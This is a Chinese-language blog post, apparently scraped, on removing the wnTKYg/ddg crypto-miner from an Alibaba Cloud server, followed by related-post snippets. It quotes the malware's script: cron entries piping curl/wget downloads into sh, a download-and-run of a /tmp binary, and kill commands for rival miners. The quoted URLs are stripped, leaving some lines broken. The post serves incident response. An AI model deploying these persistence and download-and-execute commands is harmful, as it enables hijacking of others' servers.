*/5 * * * * curl -fssl | sh
*/5 * * * * wget -q -o- | sh
發現伺服器cpu佔用率超100,先不要著急刪除檔案,確定檔案目錄
檢視挖礦指令碼
export path=$path:/bin:/usr/bin:/usr/local/bin:/usr/sbin
echo "*/5 * * * * curl -fssl
| sh" > /var/spool/cron/root
echo "*/5 * * * * wget -q -o-
| sh" >> /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/5 * * * * curl -fssl
| sh" > /var/spool/cron/crontabs/root
echo "*/5 * * * * wget -q -o-
| sh" >> /var/spool/cron/crontabs/root
if [ ! -f "/tmp/ddg.2021" ]; then
curl -fssl --compressed
(uname -m) -o /tmp/ddg.2021
fiif [ ! -f "/tmp/ddg.2021" ]; then
wget -q
(uname -m) -o /tmp/ddg.2021
fichmod +x /tmp/ddg.2021 && /tmp/ddg.2021
ps auxf | grep -v grep | grep circle_mi | awk '' | xargs kill
ps auxf | grep -v grep | grep
get.bi-chi.com
| awk '' | xargs kill
ps auxf | grep -v grep | grep
hashvault.pro
| awk '' | xargs kill
ps auxf | grep -v grep | grep
nanopool.org
| awk '' | xargs kill
ps auxf | grep -v grep | grep
minexmr.com
| awk '' | xargs kill
ps auxf | grep -v grep | grep /boot/efi/ | awk '' | xargs kill
#ps auxf | grep -v grep | grep ddg.2006 | awk '' | kill
#ps auxf | grep -v grep | grep ddg.2010 | awk '' | kill
根據上邊的指令碼清楚定時任務
top檢視 cpu299%
ps -ef | grep wntkyg
發現在 tmp目錄下生成兩個檔案imwbr1\wntkyg: 刪除這兩個檔案並把程序kill掉,
觀察兩分鐘後發現還會自動啟動
繼續檢查和網上搜尋,發現一般這個挖礦還有守護程序一般命名為,ddg* ,ps -ef | grep ddg 發現果然有這個,檢視他的啟動目指向/tmp下
去tmp下刪除相關檔案並kill掉程序,top繼續觀察,,,,終於解決。。。。
網上查詢的貼都說是因為redis,未加密引起的。以後注意,對redis進行指定內網ip請求,防火牆限制挖礦位址出入遮蔽掉,對系統檔案和應用的介面和許可權也要加固。
歡迎隨時溝通
阿里雲被挖礦程序wnTKYg入侵的解決方法
殺wntkyg病毒分兩步,第一是找到它的 切斷入口,第二步,找到它的守護程序並殺死,然後再去殺死病毒程序,有的守護程序很隱蔽,喚醒病毒之後,自動消亡,這時候top就看不到了,要留心。最近專案在做效能測試,發現cpu使用率異常,無人訪問時cpu也一直保持75 然後在xshell上top了一下,發現wn...
出海挖礦,熊市下礦工翻身的選擇
春暖花開,萬物復甦,春天來了,挖礦潮開啟,礦工每天奔走在礦場一線,有便宜電,就有他們的身影。便宜電難尋 在幣價低迷的熊市裡,在弱肉強食的礦圈中,拿到足夠便宜的電價,就等同於擁有了生存權。有礦場主表示,之前枯水期關掉的礦機,在豐水期將會有預100萬台會再次開啟。低電費成本吸引礦工們搬遷更低電費的礦場託...
今天阿里雲伺服器被掛馬wnTKYg挖礦的清理
5 curl fssl sh 5 wget q o sh直接刪除這cron資料夾,ok了 iptables a input s xmr.crypto pool.fr j drop iptables a output d xmr.crypto pool.fr j drop再次ps aux grep w...